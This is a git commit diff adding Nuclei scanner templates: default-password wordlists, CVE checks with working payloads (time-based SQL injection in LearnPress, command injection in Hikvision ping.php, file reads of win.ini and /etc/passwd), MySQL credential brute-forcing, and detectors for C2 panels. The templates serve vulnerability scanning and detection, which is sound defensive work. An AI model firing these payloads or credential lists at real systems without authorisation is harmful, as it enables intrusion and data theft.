Merge pull request #9309 from projectdiscovery/feature-branch-20240309142342
New Templates Updatepatch-1
commit
febc2b5fa2
|
@ -0,0 +1,19 @@
|
|||
mysql
|
||||
root
|
||||
chippc
|
||||
admin
|
||||
nagiosxi
|
||||
usbw
|
||||
cloudera
|
||||
moves
|
||||
testpw
|
||||
p@ck3tf3nc3
|
||||
medocheck123
|
||||
mktt
|
||||
123
|
||||
amp109
|
||||
eLaStIx.asteriskuser.2oo7
|
||||
raspberry
|
||||
openauditrootuserpassword
|
||||
vagrant
|
||||
123qweASD#
|
|
@ -0,0 +1,7 @@
|
|||
root
|
||||
admin
|
||||
cloudera
|
||||
moves
|
||||
mcUser
|
||||
dbuser
|
||||
asteriskuser
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2023-6114
|
||||
|
||||
info:
|
||||
name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
description: |
|
||||
The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.
|
||||
remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.
|
||||
reference:
|
||||
- https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing
|
||||
- https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6114
|
||||
- https://wpscan.com/plugin/duplicator/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2023-6114
|
||||
cwe-id: CWE-552
|
||||
epss-score: 0.00145
|
||||
epss-percentile: 0.50326
|
||||
cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:*
|
||||
tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
|
||||
- "{{BaseURL}}/wp-content/backups-dup-pro/tmp/"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code == 200"
|
||||
- "contains(body, '/tmp') && contains(body, '<title>Index of')"
|
||||
condition: and
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2023-6567
|
||||
|
||||
info:
|
||||
name: LearnPress <= 4.2.5.7 - SQL Injection
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||
remediation: Fixed in version 4.2.5.8
|
||||
reference:
|
||||
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by
|
||||
- https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6567
|
||||
classification:
|
||||
cve-id: CVE-2023-6567
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
publicwww-query: "/wp-content/plugins/learnpress"
|
||||
tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'contains_all(header, "lp_session_guest=", "application/json")'
|
||||
- 'contains_all(body, "status\":\"success", "No courses were found")'
|
||||
condition: and
|
|
@ -1,24 +1,21 @@
|
|||
id: CVE-2023-6895
|
||||
|
||||
info:
|
||||
name: Hikvision Intercom Broadcasting System - Command Execution
|
||||
author: archer
|
||||
name: Hikvision IP ping.php - Command Execution
|
||||
author: DhiyaneshDk,archer
|
||||
severity: critical
|
||||
description: |
|
||||
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
|
||||
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
|
||||
reference:
|
||||
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
|
||||
- https://vuldb.com/?ctiid.248254
|
||||
- https://vuldb.com/?id.248254
|
||||
- https://github.com/Marco-zcl/POC
|
||||
- https://github.com/d4n-sec/d4n-sec.github.io
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-6895
|
||||
cwe-id: CWE-78
|
||||
epss-score: 0.0008
|
||||
epss-percentile: 0.32716
|
||||
epss-percentile: 0.33389
|
||||
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -26,31 +23,35 @@ info:
|
|||
vendor: hikvision
|
||||
product: intercom_broadcast_system
|
||||
fofa-query: icon_hash="-1830859634"
|
||||
tags: cve,cve2023,rce,hikvision
|
||||
tags: cve,cve2023,hikvision,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /php/ping.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
X-Requested-With: XMLHttpRequest
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/php/ping.php"
|
||||
body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
|
||||
headers:
|
||||
Content-Type: "application/x-www-form-urlencoded"
|
||||
|
||||
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
|
||||
payloads:
|
||||
command:
|
||||
- 'id'
|
||||
- 'cmd /c ipconfig'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "Windows IP"
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
part: header
|
||||
words:
|
||||
- "TTL="
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,61 @@
|
|||
id: ispconfig-default-login
|
||||
|
||||
info:
|
||||
name: ISPConfig - Default Password
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"ispconfig"
|
||||
tags: default-login,ispconfig
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /lgoin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /login/index.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
Referer: {{RootURL}}/login/
|
||||
|
||||
username={{username}}&password={{password}}&s_mod=login&s_pg=index
|
||||
|
||||
- |
|
||||
GET /sites/web_vhost_domain_list.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: {{RootURL}}/index.php
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- 'admin'
|
||||
- 'guest'
|
||||
- 'root'
|
||||
password:
|
||||
- 'admin'
|
||||
- 'password'
|
||||
- 'toor'
|
||||
|
||||
stop-at-first-match: true
|
||||
host-redirects: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_3
|
||||
words:
|
||||
- Tools
|
||||
- Websites
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: ares-rat-c2
|
||||
|
||||
info:
|
||||
name: Area Rat C2 - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Ares is a Python Remote Access Tool.
|
||||
reference:
|
||||
- https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: product:'Ares RAT C2'
|
||||
tags: c2,ir,osint,ares,panel,rat
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>Ares</title>'
|
||||
- 'Passphrase:'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: caldera-c2
|
||||
|
||||
info:
|
||||
name: Caldera C2 - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
|
||||
reference:
|
||||
- https://github.com/mitre/caldera
|
||||
- https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: http.favicon.hash:-636718605
|
||||
tags: c2,ir,osint,caldera,panel
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>Login | CALDERA</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: hack5-cloud-c2
|
||||
|
||||
info:
|
||||
name: Hack5 Cloud C2 - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere. Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients.
|
||||
reference:
|
||||
- https://twitter.com/fofabot/status/1742737671037091854
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: app="Hak5-C2"
|
||||
tags: c2,ir,osint,hack5c2,panel
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>Hak5 Cloud C²</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: pupyc2
|
||||
|
||||
info:
|
||||
name: PupyC2 - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.
|
||||
reference:
|
||||
- https://twitter.com/TLP_R3D/status/1654038602282565632
|
||||
- https://github.com/n1nj4sec/pupy
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: aa3939fc357723135870d5036b12a67097b03309
|
||||
tags: c2,ir,osint,pupyc2,panel
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'Etag: "aa3939fc357723135870d5036b12a67097b03309"'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: supershell-c2
|
||||
|
||||
info:
|
||||
name: Supershell C2 - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel, a fully interactive shell can be obtained, and it supports multi-platform architecture Payload.
|
||||
reference:
|
||||
- https://twitter.com/S4nsLimit3/status/1693619836339859497
|
||||
- https://github.com/tdragon6/Supershell/blob/main/README_EN.md
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: icon_hash="-1010228102"
|
||||
tags: c2,ir,osint,supershell,panel
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
host-redirects: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>Supershell - 登录</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,36 @@
|
|||
id: esafenet-mysql-fileread
|
||||
|
||||
info:
|
||||
name: Esafenet CDG mysql - File Read
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
description: |
|
||||
CDGServer3 Unauthorized File Download vulnerability is detected.
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: title="电子文档安全管理系统"
|
||||
tags: esafenet,lfi,mysql
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "varchar"
|
||||
- "create table"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/x-sql"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: idocview-2word-fileupload
|
||||
|
||||
info:
|
||||
name: IDoc View /html/2word - Arbitrary File Upload
|
||||
author: DhiyaneshDK
|
||||
severity: high
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: title=="在线文档预览 - I Doc View"
|
||||
tags: idoc,rce,instrusive,file-upload
|
||||
|
||||
variables:
|
||||
file: "{{to_lower(rand_text_alpha(5))}}"
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/html/2word?url={{file}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: response
|
||||
words:
|
||||
- "{{md5(file)}}.docx"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: idocview-lfi
|
||||
|
||||
info:
|
||||
name: IDoc View - Arbitrary File Read
|
||||
author: DhiyaneshDK
|
||||
severity: high
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: title=="在线文档预览 - I Doc View"
|
||||
tags: idoc,lfi,file-read
|
||||
|
||||
variables:
|
||||
file: "{{to_lower(rand_text_alpha(5))}}"
|
||||
|
||||
http:
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- status_code == 200
|
||||
- contains(content_type, 'application/json')
|
||||
- contains_all(body, "ext", "srcUrl", "success", "md5")
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
internal: true
|
||||
name: filepath
|
||||
group: 1
|
||||
regex:
|
||||
- '"srcUrl":"\/([a-z/0-9_.]+)"'
|
|
@ -0,0 +1,36 @@
|
|||
id: office365-indexs-fileread
|
||||
|
||||
info:
|
||||
name: OfficeWeb365 Indexs Interface - Arbitary File Read
|
||||
author: DhiyaneshDK
|
||||
severity: high
|
||||
description: |
|
||||
There is any file reading in the officeWeb365 Indexs interface.
|
||||
reference:
|
||||
- https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: "OfficeWeb365"
|
||||
tags: officeweb365,lfi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "for 16-bit app support"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "image/png"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,57 @@
|
|||
id: mysql-load-file
|
||||
info:
|
||||
name: MySQL LOAD_FILE - Enable
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/mysql-databases.html
|
||||
metadata:
|
||||
shodan-query: port:3306
|
||||
verified: true
|
||||
tags: js,mysql,network,audit
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
let m = require('nuclei/mysql');
|
||||
let c = m.MySQLClient();
|
||||
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
|
||||
Export(response);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "3306"
|
||||
Query: SELECT LOAD_FILE('/etc/passwd')
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{passwords}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
passwords:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
attack: clusterbomb
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- success == true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "root:x:"
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
part: response
|
||||
json:
|
||||
- .Rows[]
|
|
@ -0,0 +1,50 @@
|
|||
id: mysql-default-login
|
||||
|
||||
info:
|
||||
name: MySQL - Default Login
|
||||
author: DhiyaneshDk,pussycat0x,ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
A MySQL service was accessed with easily guessed credentials.
|
||||
metadata:
|
||||
shodan-query: port:3306
|
||||
verified: true
|
||||
tags: js,mysql,default-login,network,fuzz
|
||||
|
||||
javascript:
|
||||
- pre-condition: |
|
||||
var m = require("nuclei/mysql");
|
||||
var c = m.MySQLClient();
|
||||
c.IsMySQL(Host, Port);
|
||||
|
||||
code: |
|
||||
var m = require("nuclei/mysql");
|
||||
var c = m.MySQLClient();
|
||||
c.Connect(Host,Port,Username,Password)
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "3306"
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{passwords}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
passwords:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
-
|
||||
attack: clusterbomb
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "response == true"
|
||||
- "success == true"
|
||||
condition: and
|
|
@ -0,0 +1,36 @@
|
|||
id: mysql-info
|
||||
|
||||
info:
|
||||
name: MySQL Info - Enumeration
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Connects to a MySQL server and prints information such as the protocol and version numbers
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/mysql-info.html
|
||||
metadata:
|
||||
shodan-query: port:3306
|
||||
tags: js,mssql,network
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
var m = require("nuclei/mysql");
|
||||
var c = m.MySQLClient();
|
||||
var response = c.FingerprintMySQL(Host,Port);
|
||||
Export(response);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "3306"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "success == true"
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '"Version: "+ .Version '
|
||||
- '"TLS "+ .TLS'
|
||||
- '"Transport: "+ .Transport '
|
|
@ -0,0 +1,51 @@
|
|||
id: mysql-show-databases
|
||||
|
||||
info:
|
||||
name: MySQL - Show Databases
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/mysql-databases.html
|
||||
metadata:
|
||||
shodan-query: port:3306
|
||||
verified: true
|
||||
tags: js,mysql,network,enum
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
let m = require('nuclei/mysql');
|
||||
let c = m.MySQLClient();
|
||||
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
|
||||
Export(response);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "3306"
|
||||
Query: "show databases;"
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{passwords}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
passwords:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
attack: clusterbomb
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "success == true"
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
part: response
|
||||
json:
|
||||
- .Rows[] | .Database
|
|
@ -0,0 +1,51 @@
|
|||
id: mysql-show-variables
|
||||
|
||||
info:
|
||||
name: MySQL - Show Variables
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
description: Attempts to show all variables on a MySQL server.
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/mysql-variables.html
|
||||
metadata:
|
||||
shodan-query: port:3306
|
||||
tags: js,mysql,network,enum
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
let m = require('nuclei/mysql');
|
||||
let c = m.MySQLClient();
|
||||
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
|
||||
Export(response);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "3306"
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{passwords}}"
|
||||
Query: "show variables;"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
passwords:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
attack: clusterbomb
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "success == true"
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
part: response
|
||||
json:
|
||||
- '.Rows[].Variable_name'
|
|
@ -0,0 +1,53 @@
|
|||
id: mysql-user-enum
|
||||
|
||||
info:
|
||||
name: MySQL - User Enumeration
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
Attempts to list all users on a MySQL server.
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/mysql-users.html
|
||||
metadata:
|
||||
shodan-query: port:3306
|
||||
verified: true
|
||||
tags: js,mysql,network,enum
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
let m = require('nuclei/mysql');
|
||||
let c = m.MySQLClient();
|
||||
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
|
||||
Export(response);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "3306"
|
||||
Query: "SELECT DISTINCT user FROM mysql.user;"
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{passwords}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
passwords:
|
||||
- root
|
||||
- admin
|
||||
- mysql
|
||||
- test
|
||||
attack: clusterbomb
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "success == true"
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
part: response
|
||||
json:
|
||||
- '.Rows[].user'
|
|
@ -0,0 +1,40 @@
|
|||
id: pop3-capabilities-enum
|
||||
|
||||
info:
|
||||
name: POP3 Capabilities - Enumeration
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
POP3 capabilities are defined in RFC 2449. The CAPA command allows a client to ask a server what commands it supports and possibly any site-specific policy. Besides the list of supported commands, the IMPLEMENTATION string giving the server version may be available.
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/pop3-capabilities.html
|
||||
metadata:
|
||||
max-request: 1
|
||||
shodan-query: "port:110"
|
||||
verified: true
|
||||
tags: js,network,pop3,enum
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
let data = "CAPA\r\n"
|
||||
let c = require("nuclei/net");
|
||||
let conn = c.Open('tcp', `${Host}:${Port}`);
|
||||
conn.Send(data);
|
||||
let result = conn.RecvString();
|
||||
let cleanedData = result.replace(/\+OK Dovecot ready\.\r\n\+OK|\r\n|\s/g, " ");
|
||||
Export(cleanedData)
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: 110
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "success == true"
|
||||
|
||||
extractors:
|
||||
- type: dsl
|
||||
name:
|
||||
dsl:
|
||||
- response
|
|
@ -0,0 +1,39 @@
|
|||
id: redis-info
|
||||
|
||||
info:
|
||||
name: Redis Info - Detect
|
||||
author: DhiyaneshDK
|
||||
severity: info
|
||||
description: |
|
||||
Retrieves information (such as version number and architecture) from a Redis key-value store.
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/redis-info.html
|
||||
metadata:
|
||||
max-request: 1
|
||||
shodan-query: product:"redis"
|
||||
tags: js,redis,network
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const redis = require('nuclei/redis');
|
||||
const info = redis.GetServerInfo(Host,Port);
|
||||
Export(info);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "6379"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: response
|
||||
regex:
|
||||
- redis_version:(\d+\.\d+\.\d+)
|
||||
- os:(.*?)\\r\\n
|
||||
- arch_bits:(\d+)\s+bits
|
||||
- process_id:(\d+)
|
||||
- used_cpu_sys:(\d+\.\d+)
|
||||
- used_cpu_user:(\d+\.\d+)
|
||||
- connected_clients:(\d+)
|
||||
- connected_slaves:(\d+)
|
||||
- used_memory_human:(\d+\.\d+[KMGTPEZY]?)
|
||||
- role:(\w+)
|
|
@ -0,0 +1,29 @@
|
|||
id: redis-require-auth
|
||||
|
||||
info:
|
||||
name: Redis Require Authentication - Detect
|
||||
author: DhiyaneshDK
|
||||
severity: info
|
||||
description: |
|
||||
IsAuthenticated checks if the redis server requires authentication
|
||||
reference:
|
||||
- https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated
|
||||
metadata:
|
||||
max-request: 1
|
||||
shodan-query: product:"redis"
|
||||
tags: js,redis,network
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const redis = require('nuclei/redis');
|
||||
const isAuthenticated = redis.IsAuthenticated(Host,Port);
|
||||
Export(isAuthenticated);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "6379"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "success == true"
|
|
@ -0,0 +1,29 @@
|
|||
id: rsync-version
|
||||
|
||||
info:
|
||||
name: Rsync Version - Detect
|
||||
author: DhiyaneshDK
|
||||
severity: info
|
||||
description: |
|
||||
Identify the Version of the Rsync Protocol
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: port:"873"
|
||||
tags: js,network,rsync,enum
